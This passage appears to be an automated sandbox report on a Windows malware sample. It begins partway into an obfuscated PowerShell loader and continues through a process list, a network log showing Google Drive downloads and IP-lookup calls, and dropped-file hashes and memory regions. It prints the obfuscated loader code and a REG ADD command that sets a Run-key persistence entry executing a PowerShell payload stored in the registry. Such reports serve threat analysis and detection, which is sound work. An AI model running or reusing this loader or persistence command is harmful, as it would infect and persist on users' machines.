.estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 4b9bc21c7f74f2fd1c8ef11ea8c09490
SHA1 296a36eb7687b0436228329baa38f0256f13cd4d
SHA256 254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949
SHA512 ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 712c85f7347b1b9f2288a220c96b841e
SHA1 790e35b7d500cea6961c44011d958a2013768378
SHA256 70187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981
SHA512 1881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 62848a3b8e3b67b5b36a517ad40a402a
SHA1 31db8d0589625d582c55a87c7877fcaa8c1b19ff
SHA256 e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e
SHA512 912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac

C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt

MD5 23da8c3612b391292f5cdc51f7bcb018
SHA1 eb345ba5705c1e629c8c44198b812619229693d3
SHA256 6cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28
SHA512 612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7

memory/1284-342-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bjnrm1zd.2rs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1284-348-0x000001AF6CBC0000-0x000001AF6CBE2000-memory.dmp

memory/1284-353-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

memory/1284-354-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

memory/1284-355-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

memory/4232-358-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

memory/4232-359-0x0000000002650000-0x0000000002686000-memory.dmp

memory/4232-360-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4232-361-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4232-362-0x0000000005200000-0x0000000005828000-memory.dmp

memory/4232-363-0x0000000004F90000-0x0000000004FB2000-memory.dmp

memory/4232-364-0x0000000005130000-0x0000000005196000-memory.dmp

memory/4232-365-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/4232-371-0x0000000005990000-0x0000000005CE4000-memory.dmp

memory/4232-376-0x0000000005F70000-0x0000000005F8E000-memory.dmp

memory/4232-377-0x0000000005FA0000-0x0000000005FEC000-memory.dmp

memory/4232-378-0x0000000007910000-0x0000000007F8A000-memory.dmp

memory/1284-379-0x00007FF9872D3000-0x00007FF9872D5000-memory.dmp

memory/4232-380-0x0000000006510000-0x000000000652A000-memory.dmp

memory/1284-381-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

memory/4232-382-0x0000000007290000-0x0000000007326000-memory.dmp

memory/4232-383-0x0000000007170000-0x0000000007192000-memory.dmp

memory/4232-384-0x0000000007F90000-0x0000000008534000-memory.dmp

C:\Users\Admin\AppData\Roaming\Restauratrens.Alb

MD5 c990e3d829b26e351547c77df1bc5953
SHA1 df0592b47bea01cc3199012205c3bf55545fb09e
SHA256 f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
SHA512 f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da

memory/4232-386-0x0000000008540000-0x000000000BC9A000-memory.dmp

memory/4232-388-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

memory/4232-389-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/4232-390-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/3412-403-0x0000000000C00000-0x0000000001E54000-memory.dmp

memory/3412-404-0x0000000000C00000-0x0000000001E54000-memory.dmp

memory/3412-405-0x0000000000C00000-0x0000000000C42000-memory.dmp

memory/4232-406-0x0000000074F60000-0x0000000075710000-memory.dmp

memory/1284-409-0x00007FF9872D0000-0x00007FF987D91000-memory.dmp

memory/3412-412-0x0000000023C70000-0x0000000023CC0000-memory.dmp

memory/3412-413-0x0000000024310000-0x00000000243A2000-memory.dmp

memory/3412-414-0x0000000024270000-0x000000002427A000-memory.dmp